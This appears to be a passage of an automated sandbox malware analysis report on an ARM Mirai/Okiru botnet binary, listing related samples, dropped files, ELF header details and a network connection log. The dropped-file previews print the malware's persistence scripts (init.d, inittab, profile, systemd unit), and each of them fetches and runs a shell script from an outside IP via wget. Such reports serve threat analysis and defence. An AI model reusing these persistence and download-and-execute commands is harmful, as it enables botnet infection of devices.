	zermips.elf	Get hash	malicious	Unknown	Browse	185.125.190.26
	zerm68k.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	zerarm6.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
INIT7CH	mipsel.nn.elf	Get hash	malicious	Okiru	Browse	109.202.202.202
	nklarm6.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	nabarm6.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	zerm68k.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	zerarm6.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	armv4eb.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse	109.202.202.202
	tftp.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	arm5.nn-20241224-0050.elf	Get hash	malicious	Okiru	Browse	109.202.202.202
	bot.sh4.elf	Get hash	malicious	Mirai, Gafgyt, Okiru	Browse	109.202.202.202
NETIXBG	x86_32.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	mipsel.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	arm7.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	94.156.227.234
	powerpc.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	arm7.nn-20241224-0051.elf	Get hash	malicious	Mirai, Okiru	Browse	94.156.227.234
	sparc.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	arm5.nn-20241224-0050.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	arm.nn-20241224-0050.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	mipsel.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
/etc/init.d/system	arm.nn.elf	Get hash	malicious	Okiru	Browse
	arm.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
	arm.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
	arm.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
	arm.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
/etc/init.d/arm.nn.elf	arm.nn.elf	Get hash	malicious	Okiru	Browse
	arm.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
	arm.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
	arm.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
	arm.nn.elf	Get hash	malicious	Mirai, Okiru	Browse

Created / dropped Files

/boot/bootcmd

Download File

Process:	/tmp/arm.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	119
Entropy (8bit):	4.679703018985171
Encrypted:	false
SSDEEP:	3:KPJRX7/LsDFDDoCvLdjX48FIbILbaaFOdFXa5O:WJRsZfoYZX48bbaaeXCO
MD5:	22B40D94325900AFDC6B9EB53D194798
SHA1:	08BE0BA4A0DBBAF03672860E49CAA446FA5A0D01
SHA-256:	B7000D755BB22142ACD09A694C2DFD398200F3428CEE07D4C9F8C794645D75DA
SHA-512:	D69CFF1875DAB0EA05BCB8A36098EC617C369D738BC0E0BF2F9220394E34D90B2B3A534AFC7F34E0DDFB56041B1BF3FC4247BA7B412D397598BB50578DDC5151
Malicious:	false
Reputation:	low
Preview:	run bootcmd_mmc0; /tmp/arm.nn.elf && wget http://94.156.227.233/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.

/etc/init.d/arm.nn.elf

Download File

Process:	/bin/sh
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	395
Entropy (8bit):	4.5256951458576244
Encrypted:	false
SSDEEP:	12:QRkuXXNxntPUJgjvMX22FMuKN+dRRucSOyd3:qNcIyX3YOM3
MD5:	91C4AC999529755823334A4B6DCD82A8
SHA1:	2A19501075932DA23C70BD6BA43A153A277C106F
SHA-256:	539CB4475ACE236662094B848B12C2AAC9325C89A5DB6742AFFE492E710BAB63
SHA-512:	CBA55E615DE4A51F6BA23BC9946B2D9A3B145EE40D1C61D60B901D43ABBCBA421C3DB52A61D9FF090C836C8EBFDA9DB2BE711BE36E12BCFF5A4B7EA37646B8C1
Malicious:	true
Joe Sandbox View:	Filename: arm.nn.elf, Detection: malicious, Browse Filename: arm.nn.elf, Detection: malicious, Browse Filename: arm.nn.elf, Detection: malicious, Browse Filename: arm.nn.elf, Detection: malicious, Browse Filename: arm.nn.elf, Detection: malicious, Browse
Reputation:	low
Preview:	#!/bin/sh.# /etc/init.d/arm.nn.elf..case "" in. start). echo 'Starting arm.nn.elf'. /tmp/arm.nn.elf &. wget http://94.156.227.233/ -O /tmp/lol.sh. chmod +x /tmp/lol.sh. /tmp/lol.sh &. ;;. stop). echo 'Stopping arm.nn.elf'. killall arm.nn.elf. ;;. restart). sh stop. sh start. ;;. *). echo "Usage: sh {start\|stop\|restart}". exit 1. ;;.esac.exit 0.

/etc/init.d/system

Download File

Process:	/tmp/arm.nn.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	106
Entropy (8bit):	4.682554646441517
Encrypted:	false
SSDEEP:	3:TKH4vZK7/LsDFDvSDRFiLdjX48FIbILpaKB0dFLoKE0:h8sZzSXoZX48bzBeLXE0
MD5:	F8346921DDA8570FAF18A4B049A6F54B
SHA1:	F360ACA003B97FC60A7010DEF8F2F8D6F2C8499E
SHA-256:	2812F2399C64C10D897C3C95CC6690503E188BE3D8410D889944394E0BBCDDDF
SHA-512:	C6073A0298CDF62D6B2159B41A90E2D7258ABD6B017E37CB93306E63B6A9362AE6353291658605D9AA07552FD89F70BD34083A4A58C32B16906220818FE078E8
Malicious:	true
Joe Sandbox View:	Filename: arm.nn.elf, Detection: malicious, Browse Filename: arm.nn.elf, Detection: malicious, Browse Filename: arm.nn.elf, Detection: malicious, Browse Filename: arm.nn.elf, Detection: malicious, Browse Filename: arm.nn.elf, Detection: malicious, Browse
Reputation:	low
Preview:	#!/bin/sh./tmp/arm.nn.elf &.wget http://94.156.227.233/ -O /tmp/lol.sh.chmod +x /tmp/lol.sh./tmp/lol.sh &.

/etc/inittab

Download File

Process:	/tmp/arm.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	111
Entropy (8bit):	4.59789251037952
Encrypted:	false
SSDEEP:	3:nAWu5d/LsDFDDoCvLdjX48FIbILbaaFOdFXa5O:AUZfoYZX48bbaaeXCO
MD5:	55ADC91BBFC3DEAAD541897F8FA8C3AA
SHA1:	9C13D4048F5E07583DBAC8E2E8351906C030490C
SHA-256:	BCED71633ACE84C49EAC303BFB7C3F09435E55E79A1E154BDCB6E3148AF4AFAB
SHA-512:	04807E43BF00C5E8BF5009FC74F763E2E4AA2DDE54BAE4687667DBC39D63B03C3ECCE6866365A5A42268B3A86E44F20497A5675EAAF65AC3B6137E6180B6E0D7
Malicious:	false
Reputation:	low
Preview:	::respawn:/tmp/arm.nn.elf && wget http://94.156.227.233/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.

/etc/motd

Download File

Process:	/tmp/arm.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	53
Entropy (8bit):	3.871459242626451
Encrypted:	false
SSDEEP:	3:yGKtARxFQFrgBJ4BJ+3e:dQ0EcHG2e
MD5:	2BD9B4BE30579E633FC0191AA93DF486
SHA1:	7D63A9BD9662E86666B27C1B50DB8E7370C624FF
SHA-256:	64DC39F3004DC93C9FC4F1467B4807F2D8E3EB0BFA96B15C19CD8E7D6FA77A1D
SHA-512:	AE6DD7B39191354CF43CF65E517460D7D4C61B8F5C08E33E6CA3C451DC7CAB4DE89F33934C89396B80F1AADE0A4E2571BD5AE8B76EF80B737D4588703D2814D5
Malicious:	false
Preview:	gorilla botnet is on the device ur not a cat go away.

/etc/profile

Download File

Process:	/tmp/arm.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	102
Entropy (8bit):	4.523807003925601
Encrypted:	false
SSDEEP:	3:Tg7/LsDFDvSDRFiLdjX48FIbILbaaFOdFXa50:TgsZzSXoZX48bbaaeXC0
MD5:	C4A190F91F287CB5371DA6C74E0DB1B1
SHA1:	88A0A8B84986C3669F1ACCDCD826E50EA179699F
SHA-256:	E12E43C2746D0AC57EF00BBC885AD0B8F6D1EE57DE9419E33A2910D90C2B1F68
SHA-512:	263F001AD19AFB93CF9337BF8A436F03C4A7EC6834CAC19B196DE794D59C61309DD4EBD66AAC0FE2715A16916483AD41AABA8A3414E10CE6DEE95D7DF0308820
Malicious:	true
Preview:	/tmp/arm.nn.elf &.wget http://94.156.227.233/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh &.

/etc/rc.local

Download File

Process:	/tmp/arm.nn.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	10
Entropy (8bit):	3.121928094887362
Encrypted:	false
SSDEEP:	3:TKH4vn:hv
MD5:	3E2B31C72181B87149FF995E7202C0E3
SHA1:	BD971BEC88149956458A10FC9C5ECB3EB99DD452
SHA-256:	A8076D3D28D21E02012B20EAF7DBF75409A6277134439025F282E368E3305ABF
SHA-512:	543F39AF1AE7A2382ED869CBD1EE1AC598A88EB4E213CD64487C54B5C37722C6207EE6DB4FA7E2ED53064259A44115C6DA7BBC8C068378BB52A25E7088EEEBD6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.

/etc/systemd/system/custom.service

Download File

Process:	/tmp/arm.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	300
Entropy (8bit):	5.05186756643222
Encrypted:	false
SSDEEP:	6:z8ifitRZAMzdK+Yz02+GWRdbZX48B+GWRo3UN2+GWRuLYACGX9LQmWA4Rv:zNitRZAOK+gp+GWRdtd+GWRXY+GWRuL6
MD5:	1436FD8C3CCFF505882485A3B599A9C6
SHA1:	6F528C6FE83928E73DF405594874CD8483BACE98
SHA-256:	79FF775817DFEF4AC56DEAC28E322E0123A89498C11C6836A478925E61F6F145
SHA-512:	07590419B290AE785D9894357A07B724B963B6E05ACFEB7C1AA2F78E80D04D5284B42D455D112F642316F9560812F5730F96A1A770AD81EC4DA35CD0898F665F
Malicious:	false
Preview:	[Unit].Description=Custom Binary and Payload Service.After=network.target..[Service].ExecStart=/tmp/arm.nn.elf.ExecStartPost=/usr/bin/wget -O /tmp/lol.sh http://94.156.227.233/.ExecStartPost=/bin/chmod +x /tmp/lol.sh.ExecStartPost=/tmp/lol.sh.Restart=on-failure..[Install].WantedBy=multi-user.target.

/memfd:snapd-env-generator (deleted)

Download File

Process:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File Type:	ASCII text
Category:	dropped
Size (bytes):	76
Entropy (8bit):	3.7627880354948586
Encrypted:	false
SSDEEP:	3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
MD5:	D86A1F5765F37989EB0EC3837AD13ECC
SHA1:	D749672A734D9DEAFD61DCA501C6929EC431B83E
SHA-256:	85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
SHA-512:	338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
Malicious:	false
Preview:	PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.

/tmp/qemu-open.vEDlp5 (deleted)

Download File

Process:	/tmp/arm.nn.elf
File Type:	data
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.5
Encrypted:	false
SSDEEP:	3:Tg7/LsDln:Tgs5n
MD5:	5A9E68CC61A24B23E7CE850CBE55CD38
SHA1:	7D53E57B760618566E5B635118604478EE1175B1
SHA-256:	300279D18C7FC46D9F271DFDD3D803874D1B222B3512385D9FFFEED712EF1D97
SHA-512:	09970D3B321DA48BAEB46B368CF5C40CCB90A0EB76300D7F5B03441FE9161AA5FD26C152CE83DC681397FD2FA81B6AD824092660285B1562F4D326C60517C7F3
Malicious:	false
Preview:	/tmp/arm.nn.elf.

Static File Info

General

File type:	ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
Entropy (8bit):	6.179174718073473
TrID:	ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name:	arm.nn.elf
File size:	91'808 bytes
MD5:	e2f7e7155399c4035b2c1c805c721610
SHA1:	d2e386a8c5f65ca9f1aec178298c545a25d58c7d
SHA256:	b223160a9b5e58400e86e34c50d2d36d1d874eabdc272641a8d66eed75245493
SHA512:	bc3aa24822b1520588f7376463664efa69fce82ded275fd1606e36e08ae034ba8ae7ee3deb391c6bf9f107095f524a8841d4eb1a1b0d87688c81e331684a5010
SSDEEP:	1536:sZPtGOlFvtMhh3POBnL4pv6YjnXQLkHdsyYA2k40v85To:sZPtGOl2Ps4pjrIkHdsDSoTo
TLSH:	DA932A51B8819623C6D523BBF67E02CD3B2613B8D2EF7216CD25AF21738692B0D77641
File Content Preview:	.ELF...a..........(.........4....e......4. ...(......................^...^...............`...`...`.......&..........Q.td..................................-...L."...1N..........0@-.\P...0....S.0...P@...0... ....R......0...0...........0... ....R..... 0....S

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, little endian
Version:	1 (current)
Machine:	ARM
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	ARM - ABI
ABI Version:	0
Entry Point Address:	0x8190
Flags:	0x202
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	3
Section Header Offset:	91408
Section Header Size:	40
Number of Section Headers:	10
Header String Table Index:	9

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0
.init	PROGBITS	0x8094	0x94	0x18	0x0	0x6	AX	4
.text	PROGBITS	0x80b0	0xb0	0x138fc	0x0	0x6	AX	16
.fini	PROGBITS	0x1b9ac	0x139ac	0x14	0x0	0x6	AX	4
.rodata	PROGBITS	0x1b9c0	0x139c0	0x252c	0x0	0x2	A	4
.ctors	PROGBITS	0x26000	0x16000	0x8	0x0	0x3	WA	4
.dtors	PROGBITS	0x26008	0x16008	0x8	0x0	0x3	WA	4
.data	PROGBITS	0x26014	0x16014	0x4bc	0x0	0x3	WA	4
.bss	NOBITS	0x264d0	0x164d0	0x2214	0x0	0x3	WA	4
.shstrtab	STRTAB	0x0	0x164d0	0x3e	0x0	0x0		1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
LOAD	0x0	0x8000	0x8000	0x15eec	0x15eec	6.2020	0x5	R E	0x8000	.init .text .fini .rodata
LOAD	0x16000	0x26000	0x26000	0x4d0	0x26e4	4.6344	0x6	RW	0x8000	.ctors .dtors .data .bss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x7	RWE	0x4

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 24, 2024 05:32:56.262065887 CET	43928	443	192.168.2.23	91.189.91.42
Dec 24, 2024 05:32:58.024949074 CET	60008	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:32:58.144735098 CET	38242	60008	94.156.227.234	192.168.2.23
Dec 24, 2024 05:32:58.144820929 CET	60008	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:32:58.145287037 CET	60008	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:32:58.264775991 CET	38242	60008	94.156.227.234	192.168.2.23
Dec 24, 2024 05:32:58.668808937 CET	60008	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:32:58.831396103 CET	38242	60008	94.156.227.234	192.168.2.23
Dec 24, 2024 05:32:59.268881083 CET	38242	60008	94.156.227.234	192.168.2.23
Dec 24, 2024 05:32:59.268989086 CET	60008	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:32:59.674797058 CET	60010	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:32:59.794428110 CET	38242	60010	94.156.227.234	192.168.2.23
Dec 24, 2024 05:32:59.794524908 CET	60010	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:32:59.794526100 CET	60010	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:32:59.914123058 CET	38242	60010	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:00.310403109 CET	60010	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:00.475285053 CET	38242	60010	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:00.923623085 CET	38242	60010	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:00.923710108 CET	60010	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:01.361974001 CET	60012	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:01.481586933 CET	38242	60012	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:01.481663942 CET	60012	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:01.481708050 CET	60012	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:01.603348970 CET	38242	60012	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:01.637233019 CET	42836	443	192.168.2.23	91.189.91.43
Dec 24, 2024 05:33:01.989860058 CET	60012	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:02.151297092 CET	38242	60012	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:02.405107975 CET	42516	80	192.168.2.23	109.202.202.202
Dec 24, 2024 05:33:02.609014988 CET	38242	60012	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:02.609105110 CET	60012	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:02.991880894 CET	60014	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:03.111635923 CET	38242	60014	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:03.111728907 CET	60014	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:03.111728907 CET	60014	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:03.231426001 CET	38242	60014	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:03.616533041 CET	60014	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:03.782820940 CET	38242	60014	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:04.233490944 CET	38242	60014	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:04.233561993 CET	60014	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:04.617650986 CET	60016	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:04.737382889 CET	38242	60016	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:04.737442970 CET	60016	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:04.737458944 CET	60016	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:04.857039928 CET	38242	60016	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:05.245486975 CET	60016	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:05.411360025 CET	38242	60016	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:05.874979019 CET	38242	60016	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:05.875042915 CET	60016	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:06.246468067 CET	60018	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:06.366211891 CET	38242	60018	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:06.366285086 CET	60018	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:06.366303921 CET	60018	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:06.485941887 CET	38242	60018	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:06.869905949 CET	60018	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:07.031405926 CET	38242	60018	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:07.478184938 CET	38242	60018	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:07.478302002 CET	60018	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:07.870807886 CET	60020	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:07.990417004 CET	38242	60020	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:07.990487099 CET	60020	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:07.990525007 CET	60020	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:08.110213995 CET	38242	60020	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:08.493901968 CET	60020	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:08.655307055 CET	38242	60020	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:09.120173931 CET	38242	60020	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:09.120246887 CET	60020	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:09.494731903 CET	60022	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:09.614319086 CET	38242	60022	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:09.614413977 CET	60022	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:09.614470959 CET	60022	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:09.734317064 CET	38242	60022	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:10.117650032 CET	60022	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:10.279266119 CET	38242	60022	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:10.732800007 CET	38242	60022	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:10.732894897 CET	60022	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:11.118443012 CET	60024	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:11.238250017 CET	38242	60024	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:11.238347054 CET	60024	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:11.238509893 CET	60024	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:11.358009100 CET	38242	60024	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:11.743594885 CET	60024	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:11.903338909 CET	38242	60024	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:12.379767895 CET	38242	60024	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:12.379862070 CET	60024	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:12.744674921 CET	60026	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:12.864603043 CET	38242	60026	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:12.864859104 CET	60026	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:12.864927053 CET	60026	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:12.984493971 CET	38242	60026	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:13.372106075 CET	60026	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:13.535372019 CET	38242	60026	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:14.003473043 CET	38242	60026	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:14.003659964 CET	60026	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:14.373099089 CET	60028	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:14.492713928 CET	38242	60028	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:14.492793083 CET	60028	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:14.492875099 CET	60028	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:14.612449884 CET	38242	60028	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:14.997812986 CET	60028	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:15.160331011 CET	38242	60028	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:15.615098953 CET	38242	60028	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:15.615396023 CET	60028	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:15.999042988 CET	60030	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:16.119045019 CET	38242	60030	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:16.119143009 CET	60030	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:16.119219065 CET	60030	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:16.238771915 CET	38242	60030	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:16.483141899 CET	43928	443	192.168.2.23	91.189.91.42
Dec 24, 2024 05:33:16.625571966 CET	60030	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:16.787275076 CET	38242	60030	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:17.239116907 CET	38242	60030	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:17.239212036 CET	60030	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:17.626315117 CET	60032	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:17.745927095 CET	38242	60032	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:17.746058941 CET	60032	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:17.746090889 CET	60032	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:17.865722895 CET	38242	60032	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:18.249330044 CET	60032	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:18.415375948 CET	38242	60032	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:18.865744114 CET	38242	60032	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:18.865833998 CET	60032	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:19.250159025 CET	60034	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:19.369883060 CET	38242	60034	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:19.369967937 CET	60034	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:19.369982958 CET	60034	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:19.489599943 CET	38242	60034	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:19.873492956 CET	60034	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:20.035304070 CET	38242	60034	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:20.490454912 CET	38242	60034	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:20.490695000 CET	60034	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:20.874279022 CET	60036	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:20.994237900 CET	38242	60036	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:20.994544983 CET	60036	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:20.994544983 CET	60036	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:21.114172935 CET	38242	60036	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:21.497998953 CET	60036	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:21.659179926 CET	38242	60036	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:22.125289917 CET	38242	60036	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:22.125389099 CET	60036	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:22.498790979 CET	60038	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:22.618421078 CET	38242	60038	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:22.618623018 CET	60038	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:22.618623018 CET	60038	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:22.738185883 CET	38242	60038	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:23.121874094 CET	60038	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:23.283230066 CET	38242	60038	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:23.742161989 CET	38242	60038	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:23.742275953 CET	60038	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:24.122687101 CET	60040	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:24.242429018 CET	38242	60040	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:24.242558002 CET	60040	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:24.242577076 CET	60040	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:24.362206936 CET	38242	60040	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:24.745645046 CET	60040	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:24.907272100 CET	38242	60040	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:25.370733023 CET	38242	60040	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:25.370913982 CET	60040	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:25.746486902 CET	60042	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:25.866189003 CET	38242	60042	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:25.866255999 CET	60042	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:25.866270065 CET	60042	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:25.985946894 CET	38242	60042	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:26.370001078 CET	60042	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:26.531308889 CET	38242	60042	94.156.227.234	192.168.2.23
